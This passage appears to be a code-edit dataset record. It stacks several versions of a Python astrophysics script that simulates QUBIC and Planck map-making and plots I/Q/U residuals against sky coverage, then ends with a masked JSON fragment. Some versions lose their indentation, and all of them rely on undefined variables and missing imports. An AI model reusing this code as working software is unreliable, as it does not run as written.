nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
if i == 0:
theidata = idata
theqdata = qdata
theudata = udata
subplot(3, 1, 1)
xlabel('Normalized coverage')
ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
xlabel('Normalized coverage')
ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
xlabel('Normalized coverage')
ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def statstr(vec):
m = np.mean(vec)
s = np.std(vec)
return '{0:.4f} +/- {1:.4f}'.format(m, s)
def plotinst(inst, shift=0.12):
for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
if quad < 4:
plot(xyc[0], xyc[1], 'ro')
else:
plot(xyc[0] + shift, xyc[1], 'bo')
xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
out = []
for i, (kind, lim) in enumerate(zip('IQU', Trange)):
map = input[..., i]
out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),
return_projected_map=True)]
return out
def profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=
True, color=None):
if range == None:
mini = np.min(x)
maxi = np.max(x)
else:
mini = range[0]
maxi = range[1]
dx = (maxi - mini) / nbins
xmin = np.linspace(mini, maxi - dx, nbins)
xmax = xmin + dx
xc = xmin + dx / 2
yval = np.zeros(nbins)
dy = np.zeros(nbins)
dx = np.zeros(nbins) + dx / 2
for i in np.arange(nbins):
ok = (x > xmin[i]) & (x < xmax[i])
yval[i] = np.mean(y[ok])
if dispersion:
fact = 1
else:
fact = np.sqrt(len(y[ok]))
dy[i] = np.std(y[ok]) / fact
if plot:
errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
return xc, yval, dx, dy
nside = 256
racenter = 0.0
deccenter = -57.0
center = equ2gal(racenter, deccenter)
sky = read_map(PATH + 'syn256_pol.fits')
sampling = create_random_pointings([racenter, deccenter], 1000, 10)
all_solutions_fusion = []
all_coverages = []
nbptg = np.linspace(1000, 5000, 5)
correct_time = 365 * 86400.0 / (nbptg / 1000)
detector_nep = 4.7e-17 / np.sqrt(correct_time / len(sampling) * sampling.period
)
for i in xrange(len(all_instruments)):
acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=
detector_nep[i])
all_coverages.append(acq_qubic.get_coverage())
convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky
)
acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
H = acq_fusion.get_operator()
invntt = acq_fusion.get_invntt_operator()
obs = acq_fusion.get_observation()
A = H.T * invntt * H
b = H.T * invntt * obs
solution_fusion = pcg(A, b, disp=True)
all_solutions_fusion.append(solution_fusion)
mask = all_coverages[0] > np.max(all_coverages[0] / 10)
reso = 3
Trange = [10, 10, 10]
for i in xrange(len(nbptg)):
figure(i)
resid = all_solutions_fusion[i]['x'] - convolved_sky
resid[~mask, :] = 0
display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
subplot(3, 1, 1)
yscale('log')
xlabel('Normalized coverage')
ylabel('I RMS residuals')
ylim(0.1, 2)
plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
yscale('log')
xlabel('Normalized coverage')
ylabel('Q RMS residuals')
ylim(0.1, 2)
plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
yscale('log')
xlabel('Normalized coverage')
ylabel('U RMS residuals')
ylim(0.1, 2)
plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
if i == 0:
theidata = idata
theqdata = qdata
theudata = udata
subplot(3, 1, 1)
xlabel('Normalized coverage')
ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
xlabel('Normalized coverage')
ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
xlabel('Normalized coverage')
ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
<|reserved_special_token_1|>
from __future__ import division
from pyoperators import pcg
from pysimulators import profile
from qubic import create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition, QubicPlanckAcquisition, QubicInstrument
from qubic.data import PATH
from qubic.io import read_map
import healpy as hp
import matplotlib.pyplot as mp
import numpy as np
def statstr(vec):
    """Summarize *vec* as a 'mean +/- standard deviation' string (4 decimals)."""
    mean_val = np.mean(vec)
    std_val = np.std(vec)
    return '%.4f +/- %.4f' % (mean_val, std_val)
def plotinst(inst, shift=0.12):
    """Plot detector centres in the focal plane: quadrants 0-3 as red dots,
    quadrants >= 4 as blue dots shifted right by *shift*."""
    centers = inst.detector.center
    quadrants = inst.detector.quadrant
    for xyc, quad in zip(centers, quadrants):
        in_first_half = quad < 4
        offset = 0 if in_first_half else shift
        marker = 'ro' if in_first_half else 'bo'
        plot(xyc[0] + offset, xyc[1], marker)
    xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=(100, 5, 5)):
    """Show gnomonic views of the I, Q, U components of *input*.

    input  : map array whose last axis is the Stokes component (I, Q, U).
    msg    : title prefix for each panel ("<msg> I", "<msg> Q", "<msg> U").
    iplot  : 1-based subplot index of the first panel in a 3x3 grid.
    reso   : gnomview resolution.
    Trange : symmetric colour limits for I, Q and U respectively.
             (Default changed from a mutable list to an equivalent tuple;
             it is only iterated, so callers are unaffected.)

    Returns the list of projected maps, one per component.  Uses the
    module-level `center` as the rotation centre and healpy as `hp`.
    """
    out = []
    for i, (kind, lim) in enumerate(zip('IQU', Trange)):
        map = input[..., i]
        out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
            max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),
            return_projected_map=True)]
    return out
def profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=
    True, color=None):
    """Bin the scatter (x, y) into *nbins* equal-width bins in x.

    Parameters
    ----------
    x, y : array-like
        Samples to bin (same length).
    range : sequence of two floats, optional
        (min, max) of the binning interval; defaults to the extrema of x.
    nbins : int
        Number of equal-width bins.
    fmt, color :
        Style arguments forwarded to ``errorbar`` when plotting.
    plot : bool
        If True, draw the profile with pylab's ``errorbar``.
    dispersion : bool
        If True, the y error is the in-bin standard deviation; otherwise
        the standard error of the mean (std / sqrt(N)).

    Returns
    -------
    xc, yval, dx, dy : ndarrays
        Bin centres, per-bin mean of y, half bin widths, and y errors.
    """
    if range is None:  # identity test, not '== None'
        mini = np.min(x)
        maxi = np.max(x)
    else:
        mini = range[0]
        maxi = range[1]
    dx = (maxi - mini) / nbins
    xmin = np.linspace(mini, maxi - dx, nbins)
    xmax = xmin + dx
    xc = xmin + dx / 2
    yval = np.zeros(nbins)
    dy = np.zeros(nbins)
    dx = np.zeros(nbins) + dx / 2
    for i in np.arange(nbins):
        # NOTE(review): strict inequalities drop samples sitting exactly on
        # a bin edge (including x == mini and x == maxi); an empty bin
        # yields NaN from np.mean -- confirm both are intended.
        ok = (x > xmin[i]) & (x < xmax[i])
        yval[i] = np.mean(y[ok])
        if dispersion:
            fact = 1
        else:
            fact = np.sqrt(len(y[ok]))
        dy[i] = np.std(y[ok]) / fact
    if plot:
        errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
    return xc, yval, dx, dy
# --- Simulation setup --------------------------------------------------------
nside = 256
# Field centre in equatorial coordinates (degrees), converted to galactic.
racenter = 0.0
deccenter = -57.0
center = equ2gal(racenter, deccenter)
# Input polarized sky map (I, Q, U).
sky = read_map(PATH + 'syn256_pol.fits')
# Random pointing strategy: 1000 pointings within a 10 deg radius.
sampling = create_random_pointings([racenter, deccenter], 1000, 10)
all_solutions_fusion = []
all_coverages = []
# Scan the number of pointings from 1000 to 5000; total observing time is
# rescaled so every case integrates the same overall duration.
nbptg = np.linspace(1000, 5000, 5)
correct_time = 365 * 86400.0 / (nbptg / 1000)
# Detector NEP scaled to the effective integration time per sample.
detector_nep = 4.7e-17 / np.sqrt(correct_time / len(sampling) * sampling.period
    )
# NOTE(review): 'all_instruments' and 'names' are never defined in this file,
# and Python 2 'xrange' plus pylab globals (figure, clf, plot, ...) are used
# without import -- presumably this ran in a pylab session; confirm.  The loop
# length here is presumably meant to match len(nbptg).
for i in xrange(len(all_instruments)):
    acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=
        detector_nep[i])
    all_coverages.append(acq_qubic.get_coverage())
    # Convolve the input sky with the instrument peak response.
    convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
    acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky
        )
    # Joint QUBIC + Planck ("fusion") acquisition.
    acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
    H = acq_fusion.get_operator()
    invntt = acq_fusion.get_invntt_operator()
    obs = acq_fusion.get_observation()
    # Solve the generalized least-squares map-making system
    # (H^T N^-1 H) x = H^T N^-1 d with a preconditioned conjugate gradient.
    A = H.T * invntt * H
    b = H.T * invntt * obs
    solution_fusion = pcg(A, b, disp=True)
    all_solutions_fusion.append(solution_fusion)
# Keep only well-covered pixels (coverage above 10% of the maximum of the
# first case's coverage map).
mask = all_coverages[0] > np.max(all_coverages[0] / 10)
reso = 3
Trange = [10, 10, 10]
# Display residual (reconstructed - convolved input) maps and print the
# masked I/Q/U RMS for each case.
for i in xrange(len(nbptg)):
    figure(i)
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    resid[~mask, :] = 0
    display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
    print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))
# --- RMS residuals versus normalized coverage --------------------------------
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    # Profile the I/Q/U residuals versus normalized coverage; index [3] of
    # each result is the per-bin dispersion (RMS).
    idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
        nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
        plot=False)
    qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
        nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
        plot=False)
    udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
        nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
        plot=False)
    subplot(3, 1, 1)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('I RMS residuals')
    ylim(0.1, 2)
    plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
    if i == 0:
        # sqrt(2) reference: expected degradation for the first instrument.
        plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names
            [i] + ' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
    subplot(3, 1, 2)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('Q RMS residuals')
    ylim(0.1, 2)
    plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
    if i == 0:
        plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names
            [i] + ' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
    subplot(3, 1, 3)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('U RMS residuals')
    ylim(0.1, 2)
    plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
    if i == 0:
        plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names
            [i] + ' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
# --- Same RMS profiles, as ratios w.r.t. the first (full) instrument ---------
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
        nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
        plot=False)
    qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
        nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
        plot=False)
    udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
        nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
        plot=False)
    # Reference profiles taken from the first case (i == 0).
    if i == 0:
        theidata = idata
        theqdata = qdata
        theudata = udata
    subplot(3, 1, 1)
    xlabel('Normalized coverage')
    ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0.0, 3)
    plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
    plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)
    legend(fontsize=fs, loc='upper right')
    subplot(3, 1, 2)
    xlabel('Normalized coverage')
    ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0.0, 3)
    plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)
    plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
    legend(fontsize=fs, loc='upper right')
    subplot(3, 1, 3)
    xlabel('Normalized coverage')
    ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0.0, 3)
    plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)
    plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
    legend(fontsize=fs, loc='upper right')
<|reserved_special_token_1|>
from __future__ import division
from pyoperators import pcg
from pysimulators import profile
from qubic import (
create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition,
QubicPlanckAcquisition, QubicInstrument)
from qubic.data import PATH
from qubic.io import read_map
import healpy as hp
import matplotlib.pyplot as mp
import numpy as np
def statstr(vec):
    """Return the mean and std of *vec* formatted as 'mean +/- std'."""
    m=np.mean(vec)
    s=np.std(vec)
    return '{0:.4f} +/- {1:.4f}'.format(m,s)
def plotinst(inst,shift=0.12):
    """Scatter-plot detector centres: quadrants 0-3 as red dots, others as
    blue dots shifted by *shift* along x (pylab plot/xlim must be in scope)."""
    for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
        if quad < 4:
            plot(xyc[0],xyc[1],'ro')
        else:
            plot(xyc[0]+shift,xyc[1],'bo')
    xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
    """Gnomonic I/Q/U views of *input* around the module-level ``center``;
    returns the list of projected maps.  ``Trange`` is the symmetric colour
    range per Stokes component; ``iplot`` the first subplot index (3x3 grid).
    """
    out = []
    for i, (kind, lim) in enumerate(zip('IQU', Trange)):
        # 'map' shadows the builtin; kept for byte-compatibility.
        map = input[..., i]
        out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
                        max=lim, title=msg + ' ' + kind,
                        sub=(3, 3, iplot + i), return_projected_map=True)]
    return out
def profile(x,y,range=None,nbins=10,fmt=None,plot=True, dispersion=True, color=None):
    """Bin the scatter (x, y) into *nbins* equal-width bins in x.

    range : optional (min, max) of the binning interval, defaulting to the
        extrema of x.  dispersion selects the in-bin standard deviation
        (True) or the standard error of the mean (False) as the y error.
    Returns (xc, yval, dx, dy): bin centres, per-bin mean of y, half bin
    widths and y errors.  If *plot*, draws the profile with pylab errorbar.
    """
    if range is None:  # identity test, not '== None'
        mini = np.min(x)
        maxi = np.max(x)
    else:
        mini = range[0]
        maxi = range[1]
    dx = (maxi - mini) / nbins
    xmin = np.linspace(mini,maxi-dx,nbins)
    xmax = xmin + dx
    xc = xmin + dx / 2
    yval = np.zeros(nbins)
    dy = np.zeros(nbins)
    dx = np.zeros(nbins) + dx / 2
    for i in np.arange(nbins):
        # NOTE(review): strict inequalities drop samples exactly on a bin
        # edge; an empty bin yields NaN from np.mean -- confirm intended.
        ok = (x > xmin[i]) & (x < xmax[i])
        yval[i] = np.mean(y[ok])
        if dispersion:
            fact = 1
        else:
            fact = np.sqrt(len(y[ok]))
        dy[i] = np.std(y[ok])/fact
    if plot: errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
    return xc, yval, dx, dy
# --- Simulation setup --------------------------------------------------------
nside = 256
racenter = 0.0  # deg
deccenter = -57.0  # deg
# Field centre converted from equatorial to galactic coordinates.
center = equ2gal(racenter, deccenter)
# Input polarized sky map (I, Q, U).
sky = read_map(PATH + 'syn256_pol.fits')
# Random pointing strategy: 1000 pointings within a 10 deg radius.
sampling = create_random_pointings([racenter, deccenter], 1000, 10)
all_solutions_fusion = []
all_coverages = []
# Scan the number of pointings 1000..5000; total observing time rescaled so
# every case integrates the same overall duration.
nbptg = np.linspace(1000,5000,5)
correct_time = 365*86400./(nbptg/1000)
# Detector NEP scaled to the effective integration time per sample.
detector_nep = 4.7e-17/np.sqrt(correct_time / len(sampling)*sampling.period)
# NOTE(review): 'all_instruments' and 'names' are never defined in this file,
# and Python 2 'xrange' plus pylab globals (figure, clf, plot, ...) are used
# without import -- presumably a pylab session; confirm.  The loop length is
# presumably meant to match len(nbptg).
for i in xrange(len(all_instruments)):
    acq_qubic = QubicAcquisition(150, sampling, nside=nside,
                                 detector_nep=detector_nep[i])
    all_coverages.append(acq_qubic.get_coverage())
    # Convolve the input sky with the instrument peak response.
    convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
    acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky)
    # Joint QUBIC + Planck ("fusion") acquisition.
    acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
    H = acq_fusion.get_operator()
    invntt = acq_fusion.get_invntt_operator()
    obs = acq_fusion.get_observation()
    # Solve (H^T N^-1 H) x = H^T N^-1 d with preconditioned conjugate gradient.
    A = H.T * invntt * H
    b = H.T * invntt * obs
    solution_fusion = pcg(A, b, disp=True)
    all_solutions_fusion.append(solution_fusion)
# Keep only well-covered pixels (coverage above 10% of maximum).
mask = all_coverages[0] > np.max(all_coverages[0]/10)
reso=3
Trange=[10, 10, 10]
# Display residual (reconstructed - convolved input) maps and print the
# masked I/Q/U RMS for each case.
for i in xrange(len(nbptg)):
    figure(i)
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    resid[~mask,:] = 0
    display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
    print(std(resid[mask,0]), std(resid[mask,1]), std(resid[mask,2]))
    #savefig(names[i]+'.png')
# --- RMS residuals versus normalized coverage --------------------------------
cols=['black', 'red','blue','green', 'orange']
aa=0.2
rng = [-2,4]
fs=8
nb=20
clf()
for i in xrange(len(all_instruments)):
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    # Profile the I/Q/U residuals vs normalized coverage; index [3] of each
    # result is the per-bin dispersion (RMS).
    idata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)
    qdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)
    udata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)
    subplot(3,1,1)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('I RMS residuals')
    ylim(0.1,2)
    plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
    # sqrt(2) reference curve for the first instrument.
    if i==0: plot(idata[0], idata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
    subplot(3,1,2)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('Q RMS residuals')
    ylim(0.1,2)
    plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
    if i==0: plot(qdata[0], qdata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
    subplot(3,1,3)
    yscale('log')
    xlabel('Normalized coverage')
    ylabel('U RMS residuals')
    ylim(0.1,2)
    plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
    if i==0: plot(udata[0], udata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
    legend(fontsize=fs, loc='upper right')
#savefig('rms.png')
# --- Same RMS profiles, as ratios w.r.t. the first (full) instrument ---------
cols=['black', 'red','blue','green', 'orange']
aa=0.2
rng = [-2,4]
fs=8
nb=20
clf()
for i in xrange(len(all_instruments)):
    resid = all_solutions_fusion[i]['x'] - convolved_sky
    idata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)
    qdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)
    udata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)
    # Reference profiles taken from the first case (i == 0).
    if i == 0 :
        theidata = idata
        theqdata = qdata
        theudata = udata
    subplot(3,1,1)
    xlabel('Normalized coverage')
    ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0.,3)
    plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
    plot(idata[0], idata[3]/theidata[3], color=cols[i], label=names[i], lw=2)
    legend(fontsize=fs, loc='upper right')
    subplot(3,1,2)
    xlabel('Normalized coverage')
    ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0.,3)
    plot(qdata[0], qdata[3]/theqdata[3], color=cols[i], label=names[i], lw=2)
    plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
    legend(fontsize=fs, loc='upper right')
    subplot(3,1,3)
    xlabel('Normalized coverage')
    ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
    ylim(0.,3)
    plot(udata[0], udata[3]/theudata[3], color=cols[i], label=names[i], lw=2)
    plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
    legend(fontsize=fs, loc='upper right')
#savefig('rms_ratio.png')
|
flexible
|
{
"blob_id": "bcb028bd25732e17ed1478e122ac3b2d1abf2520",
"index": 7931,
"step-1": "<mask token>\n\n\ndef statstr(vec):\n m = np.mean(vec)\n s = np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m, s)\n\n\ndef plotinst(inst, shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):\n if quad < 4:\n plot(xyc[0], xyc[1], 'ro')\n else:\n plot(xyc[0] + shift, xyc[1], 'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),\n return_projected_map=True)]\n return out\n\n\ndef profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=\n True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini, maxi - dx, nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion:\n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok]) / fact\n if plot:\n errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef statstr(vec):\n m = np.mean(vec)\n s = np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m, s)\n\n\ndef plotinst(inst, shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):\n if quad < 4:\n plot(xyc[0], xyc[1], 'ro')\n else:\n plot(xyc[0] + shift, xyc[1], 'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),\n return_projected_map=True)]\n return out\n\n\ndef profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=\n True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini, maxi - dx, nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion:\n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok]) / fact\n if plot:\n errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\n<mask token>\nfor i in xrange(len(all_instruments)):\n acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=\n detector_nep[i])\n all_coverages.append(acq_qubic.get_coverage())\n convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)\n acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky\n )\n acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)\n H = acq_fusion.get_operator()\n invntt = acq_fusion.get_invntt_operator()\n obs = acq_fusion.get_observation()\n A = H.T * invntt * H\n b = H.T * invntt * obs\n solution_fusion = pcg(A, b, disp=True)\n 
